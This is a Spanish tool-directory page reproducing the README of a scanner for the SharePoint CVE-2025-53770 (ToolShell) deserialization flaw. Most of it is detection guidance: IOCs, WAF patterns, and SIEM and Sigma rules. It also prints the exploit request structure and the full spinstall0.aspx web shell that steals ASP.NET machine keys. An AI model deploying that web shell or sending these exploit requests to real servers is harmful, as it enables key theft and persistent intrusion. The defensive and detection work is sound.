Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-53770-Scanner — Escáner ToolShell - CVE-2025-53770 e información de detección | Kitploit
Herramientas/GitHubGitHub/zephrfish/cve-2025-53770-scanner
Herramientas DefensivasGestión de Indicadores de Compromiso (IOC)Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónInteligencia de AmenazasRespuesta a IncidentesAnálisis de Registros
GitHubzephrfish/cve-2025-53770-scanner

CVE-2025-53770-Scanner

Escáner ToolShell - CVE-2025-53770 e información de detección

1855hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
Compartir

CVE-2025-53770 Escáner de Vulnerabilidades de SharePoint

100% improvisado con todos los tweets que circulan con payloads y diferentes ataques, por lo que viene sin garantía, etc. El escáner está diseñado para identificar instancias vulnerables y tiene una configuración con usos conocidos de explotación en el entorno real. Está diseñado principalmente para uso defensivo, para identificar instancias vulnerables y permitirte parchearlas.

Este escáner realiza comprobaciones automatizadas de implementaciones de SharePoint mediante:

  • Enviando solicitudes POST manipuladas a los endpoints de ToolPane de SharePoint con payloads de explotación
  • Detectando intentos de extracción de clave de máquina y explotación exitosa
  • Identificando despliegue de payload secundario (spinstall0.aspx)
  • Analizando respuestas en busca de indicadores de vulnerabilidad basados en patrones de ataque observados
  • Proporcionando informes detallados con niveles de confianza y alertas de acción inmediata
  • Soporte de escaneo concurrente para eficiencia

Capacidades Clave de Detección

CRÍTICO: Detección de Extracción de Clave de Máquina

  • Detecta respuestas exitosas de extracción de clave de máquina
  • Identifica exposición de ValidationKey, DecryptionKey y CompatibilityMode
  • Reconoce patrones de clave de máquina delimitados por tuberías (ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode)
  • Activa alertas de acción inmediata para sistemas comprometidos

Detección de Payload Secundario

  • Identifica intentos de despliegue de spinstall0.aspx
  • Detecta patrones de código de payload C# ASP.NET
  • Reconoce el uso de System.Web.Configuration.MachineKeySection
  • Detección de ruta específica de versión (SP2013: WEBSER~1\15\ vs SP2016+: WEBSER~1\16\)

Instalación

  1. Clona el repositorio:
root@kitploit:~
git clone https://github.com/ZephrFish/CVE-2025-53770-Scanner
cd CVE-2025-53770-Scanner
  1. Instala las dependencias:
root@kitploit:~
pip install -r requirements.txt

Uso

Uso Básico

Crea un archivo de texto con los hosts objetivo (uno por línea):

root@kitploit:~
sharepoint1.example.com
sharepoint2.example.net
internal-sp.company.local

Ejecuta el escáner:

root@kitploit:~
python3 scanner.py -i hosts.txt

python3 scanner.py -i hosts.txt -o results.json -l scan.log -t 20 -v

Opciones de Línea de Comandos

OpciónDescripciónPor Defecto
-i, --inputRuta al archivo de lista de hosts (requerido)-
-o, --outputArchivo de salida para resultados (.json, .csv, .txt)None
-l, --logfileRuta del archivo de log para registro detalladoNone
-t, --threadsNúmero de hilos concurrentes10
-v, --verboseHabilitar salida detallada y registroFalse

Formatos de Salida

Salida JSON (-o results.json)

root@kitploit:~
[
  {
    "host": "sharepoint.example.com",
    "url": "https://sharepoint.example.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
    "scan_time": "2025-07-21T10:30:00.123456",
    "vulnerable": true,
    "status_code": 200,
    "response_size": 15432,
    "error": null,
    "response_time": 1.23
  }
]

Salida CSV (-o results.csv)

Proporciona datos tabulares adecuados para análisis en hojas de cálculo con columnas para todas las métricas de escaneo.

Salida de Texto (-o results.txt)

Formato legible con estado de vulnerabilidad y detalles del escaneo.

Detalles de la Vulnerabilidad

CVE-2025-53770 apunta a una vulnerabilidad de deserialización en el componente ExcelDataSet de SharePoint que ha sido explotada activamente en el entorno real. El escáner detecta:

Patrones de Ataque Identificados

  1. Explotación Inicial: Solicitud POST a /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx con payload serializado
  2. Extracción de Clave de Máquina: Explotación exitosa devuelve configuración de máquina delimitada por tuberías:
    root@kitploit:~
    ValidationKey|Validation|DecryptionKey|Decryption|CompatibilityMode
    Ejemplo: [128-256 caracteres hex]|HMACSHA256|[48-96 caracteres hex]|AES|Framework45
    
  3. Payload Secundario: Despliegue de spinstall0.aspx para acceso persistente y extracción de clave
  4. Segmentación por Versión: Diferentes rutas para versiones de SharePoint (layouts 15/ vs 16/)

IOCs Confirmados de Explotación Activa

  • User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
  • Referer: /_layouts/SignOut.aspx
  • Content-Length: Típicamente 7699-8000+ bytes
  • Tamaño del Payload: Parámetros CompressedDataTable grandes codificados en base64
  • Indicadores de Respuesta: Cadenas de clave de máquina, despliegue de spinstall0.aspx
  • Infraestructura de Ataque: 65.38.121.198, 162.243.204.189, 165.22.18.129

Lógica de Detección

El escáner analiza las respuestas en busca de:

  1. Patrones de extracción de clave de máquina (confianza CRÍTICA)
  2. Indicadores de payload secundario (confianza ALTA)
  3. Procesamiento de componentes ExcelDataSet/Scorecard (confianza MEDIA)
  4. Patrones de error de ToolPane y características de respuesta anómalas (confianza BAJA)

Consideraciones de Seguridad

  • Esta herramienta está diseñada solo para pruebas de seguridad autorizadas
  • Asegura la autorización adecuada antes de escanear cualquier sistema
  • El escáner utiliza HTTPS por defecto pero acepta certificados autofirmados
  • Los logs pueden contener información sensible - asegúralos adecuadamente
  • Considera el impacto en la red al usar un número alto de hilos

Ejemplo de Sesión de Escaneo

root@kitploit:~
$ python3 scanner.py -i corporate-sharepoint.txt -o vuln-results.json -l scan.log -v

Iniciando escaneo de 150 hosts con 10 hilos...
Objetivo CVE: CVE-2025-53770 (deserialización de ExcelDataSet en SharePoint)
Registrando en: scan.log
Los resultados se guardarán en: vuln-results.json

[+] VULNERABLE [CRÍTICO]: sp-prod-01.acme.local
[-] No vulnerable: sp-dev-02.acme.local
[!] ERROR: offline-sp.acme.local - Tiempo de conexión agotado
[+] VULNERABLE [ALTA]: sp-legacy.acme.local
Progreso: 50/150 (33.3%)
Progreso: 100/150 (66.7%)
Progreso: 150/150 (100.0%)

============================================================
ESCANEO COMPLETADO
============================================================
Total de hosts escaneados: 150
Hosts vulnerables: 3
Tasa de éxito: 97.3%

HOSTS VULNERABLES (CVE-2025-53770):

  CRÍTICO - CLAVE DE MÁQUINA EXTRAÍDA (1 hosts):
    • sp-prod-01.acme.local (Tiempo de respuesta: 0.85s, Versión: 2016+)
      ADVERTENCIA: SE REQUIERE ACCIÓN INMEDIATA: Claves de máquina comprometidas

  ALTA CONFIANZA (1 hosts):
    • sp-legacy.acme.local (Tiempo de respuesta: 1.23s, Versión: 2013-2016)

  BAJA CONFIANZA (1 hosts):
    • sp-archive.acme.local (Tiempo de respuesta: 2.10s, Versión: Desconocida)

Resultados detallados guardados en: vuln-results.json

Solución de Problemas

Problemas Comunes

  1. Tiempos de Conexión Agotados: Aumentar el tiempo de espera o reducir el número de hilos
  2. Errores SSL: El escáner desactiva las advertencias SSL por defecto
  3. Errores de Permiso: Asegúrate de tener acceso de escritura para los archivos de salida/log
  4. Uso de Memoria: Monitorear con listas grandes de hosts

Análisis de Logs

Habilitar registro detallado (-v) y archivos de log (-l) para solucionar problemas detallados:

root@kitploit:~
tail -f scan.log

Análisis de Explotación

Payloads de Ataque Observados

El escáner incorpora detección de patrones de explotación confirmados observados en ataques activos:

Estructura del Payload Primario

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7699
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Connection: close

MSOTlPn_Uri=http%3A%2F%2F{{host}}%2F_controltemplates%2F15%2FAclEditor.ascx
&MSOTlPn_DWP=[Payload ExcelDataSet con CompressedDataTable que contiene exploit serializado]

Payload Secundario (spinstall0.aspx)

root@kitploit:~
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>

Formato Esperado de Respuesta de Clave de Máquina

root@kitploit:~
ValidationKey: [cadena hexadecimal de 128-256 caracteres]
Validation: HMACSHA256|HMACSHA1|SHA1
DecryptionKey: [cadena hexadecimal de 48-96 caracteres]
Decryption: AES|DES|3DES
CompatibilityMode: Framework20SP1|Framework45|Framework40

Guía de Detección y Monitoreo

Detectando Intentos de Explotación de CVE-2025-53770

Las organizaciones deben implementar los siguientes mecanismos de detección para identificar posibles intentos de explotación:

1. Reglas de Firewall de Aplicaciones Web (WAF)

Monitorear solicitudes POST sospechosas a los endpoints de ToolPane de SharePoint:

root@kitploit:~
# Ejemplo de patrones de reglas de detección WAF
POST /_layouts/15/ToolPane.aspx*
POST /_layouts/*/ToolPane.aspx*
Cadena de consulta: "DisplayMode=Edit&a=/ToolPane.aspx"
Cuerpo de la solicitud que contenga: "MSOTlPn_Uri", "MSOTlPn_DWP"
Cuerpo de la solicitud que contenga: "ExcelDataSet", "CompressedDataTable"
Cuerpo de la solicitud que contenga: "Scorecard:ExcelDataSet"
Cuerpo de la solicitud que contenga: "H4sIAAAAAAAEA" (bytes mágicos gzip en base64)
Content-Length > 5000 bytes (tamaño típico de payload)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Referer: /_layouts/SignOut.aspx

Patrones de explotación observados:

  • Tamaños de payload típicamente de 7000-8000+ bytes
  • Datos comprimidos codificados en URL en el parámetro CompressedDataTable
  • Cadena User-Agent específica: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
  • Content-Type: application/x-www-form-urlencoded
  • Cabecera Connection: close a menudo presente
  • Objetos .NET serializados codificados en base64 en el payload
  • La respuesta contiene claves de máquina en formato delimitado por tuberías
  • Solicitudes secundarias a archivos spinstall0.aspx desplegados

2. Logs ULS de SharePoint

Monitorear los logs del Servicio de Registro Unificado (ULS) de SharePoint para:

root@kitploit:~
Categoría: SharePoint Foundation Web Controls
Nivel: Inesperado, Error, Crítico
Palabras clave: "ToolPane", "ExcelDataSet", "Deserialization"
Proceso: w3wp.exe

Indicadores clave en logs ULS:

  • Excepciones inesperadas en el procesamiento de ToolPane.aspx
  • Errores de deserialización en componentes Microsoft.PerformancePoint
  • Corrupción de memoria o cierres de proceso en w3wp.exe

3. Logs de Acceso IIS

Monitorear logs IIS para patrones de explotación:

root@kitploit:~
# Consultas de análisis de logs (reemplazar con la sintaxis de tu SIEM)
cs-method="POST" AND cs-uri-stem="/_layouts/15/ToolPane.aspx"
cs-method="POST" AND cs-uri-query="DisplayMode=Edit&a=/ToolPane.aspx"
cs-bytes > 7000 (tamaño típico del payload de exploit)
cs(User-Agent)="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
cs(Referer)="/_layouts/SignOut.aspx"
sc-status=200 AND time-taken > 5000 (procesamiento lento indicando deserialización)

IOCs específicos de ataques reales:

root@kitploit:~
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx
Content-Length: 7699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Referer: /_layouts/SignOut.aspx
Cuerpo contiene: MSOTlPn_Uri=http%3A%2F%2F[domain]%2F_controltemplates%2F15%2FAclEditor.ascx
Cuerpo contiene: CompressedDataTable%3D%22H4sIAAAAAAAEANVa23LbSJLt3stEzMzu0%2F6AQs%2B2BJCiu%2BWQ

4. Análisis de Tráfico de Red

Monitorear el tráfico de red para:

  • Tamaños inusuales de solicitudes POST hacia servidores SharePoint
  • Solicitudes repetidas a ToolPane.aspx desde fuentes únicas
  • Payloads codificados en base64 en cuerpos de solicitudes HTTP POST
  • Cadenas User-Agent que no sean de navegador apuntando a SharePoint

5. Logs de Eventos de Windows

Monitorear los Logs de Eventos de Windows en servidores SharePoint:

root@kitploit:~
Log de Eventos: Application
Origen: ASP.NET, SharePoint Foundation
IDs de Evento: 1309, 1310 (errores de aplicación)
Log de Eventos: System
Origen: Application Error
Proceso: w3wp.exe crashes

6. Reglas de Detección SIEM

Consulta de Detección para Splunk:
root@kitploit:~
index=iis source="*iis*" 
| search cs_method="POST" cs_uri_stem="/_layouts/15/ToolPane.aspx" cs_uri_query="DisplayMode=Edit&a=/ToolPane.aspx"
| eval payload_size=tonumber(cs_bytes)
| where payload_size > 7000
| search cs_User_Agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"
| stats count by src_ip, cs_uri_stem, payload_size
| sort -payload_size
Detección Mejorada para Ataques Reales:
root@kitploit:~
index=iis 
| search cs_method="POST" AND cs_uri_stem="/_layouts/15/ToolPane.aspx"
| where cs_bytes > 7000 AND cs_bytes < 10000
| search cs_Referer="/_layouts/SignOut.aspx"
| eval attack_pattern=if(like(cs_User_Agent, "%Windows NT 10.0; Win64; x64; rv:120.0%"), "CVE-2025-53770", "Other")
| where attack_pattern="CVE-2025-53770"
| table _time, src_ip, cs_uri_query, cs_bytes, sc_status
Consulta Elastic/Kibana:
root@kitploit:~
{
  "query": {
    "bool": {
      "must": [
        {"term": {"http.request.method": "POST"}},
        {"term": {"url.path": "/_layouts/15/ToolPane.aspx"}},
        {"term": {"url.query": "DisplayMode=Edit&a=/ToolPane.aspx"}},
        {"range": {"http.request.bytes": {"gte": 7000, "lte": 10000}}},
        {"term": {"user_agent.original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0"}},
        {"term": {"http.request.referrer": "/_layouts/SignOut.aspx"}}
      ]
    }
  }
}
Regla Sigma para CVE-2025-53770:
root@kitploit:~
title: CVE-2025-53770 SharePoint ExcelDataSet Exploitation
id: cve-2025-53770-sharepoint-exploit
description: Detecta intentos de explotación de la vulnerabilidad de deserialización CVE-2025-53770 en SharePoint
references:
    - https://github.com/your-repo/CVE-2025-53770-Scanner
author: Security Team
date: 2025/07/21
logsource:
    category: webserver
    product: iis
detection:
    selection:
        cs-method: 'POST'
        cs-uri-stem: '/_layouts/15/ToolPane.aspx'
        cs-uri-query: 'DisplayMode=Edit&a=/ToolPane.aspx'
        cs-bytes: 
            - gte: 7000
            - lte: 10000
        cs-User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0'
        cs-Referer: '/_layouts/SignOut.aspx'
    condition: selection
falsepositives:
    - Actividades administrativas legítimas de SharePoint
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2025.53770

7. Indicadores de Comportamiento

Vigilar estos comportamientos posteriores a la explotación:

  • Conexiones de red salientes inusuales desde servidores SharePoint
  • Nuevas cuentas de usuario creadas en SharePoint o Active Directory
  • Cargas o modificaciones de archivos no autorizadas
  • Intentos de escalada de privilegios
  • Movimiento lateral a otros sistemas

Acciones de Respuesta Recomendadas

  1. Respuesta Inmediata:

    • Bloquear las IPs de origen sospechosas en el firewall/WAF
    • Aislar los servidores SharePoint afectados si se confirma la explotación
    • Preservar logs y volcados de memoria para análisis forense
  2. Investigación:

    • Analizar los payloads de las solicitudes POST en busca de contenido malicioso
    • Verificar indicadores de ejecución de código exitosa
    • Revisar actividades de cuentas de usuario y cambios de permisos
    • Correlacionar con otros eventos de seguridad
  3. Contención:

    • Aplicar parches de seguridad inmediatamente
    • Implementar reglas WAF para bloquear intentos de explotación
    • Segmentar servidores SharePoint de recursos de red críticos

Ejemplos de Integración SIEM

Importación de Resultados de Escaneo en Splunk:

root@kitploit:~
# Convertir resultados de escaneo para ingesta en Splunk
python3 scanner.py -i hosts.txt -o results.json
# Importar al índice de Splunk
curl -k -H "Authorization: Splunk <token>" -X POST \
  "https://splunk-server:8088/services/collector" \
  -d @results.json
Descargar herramienta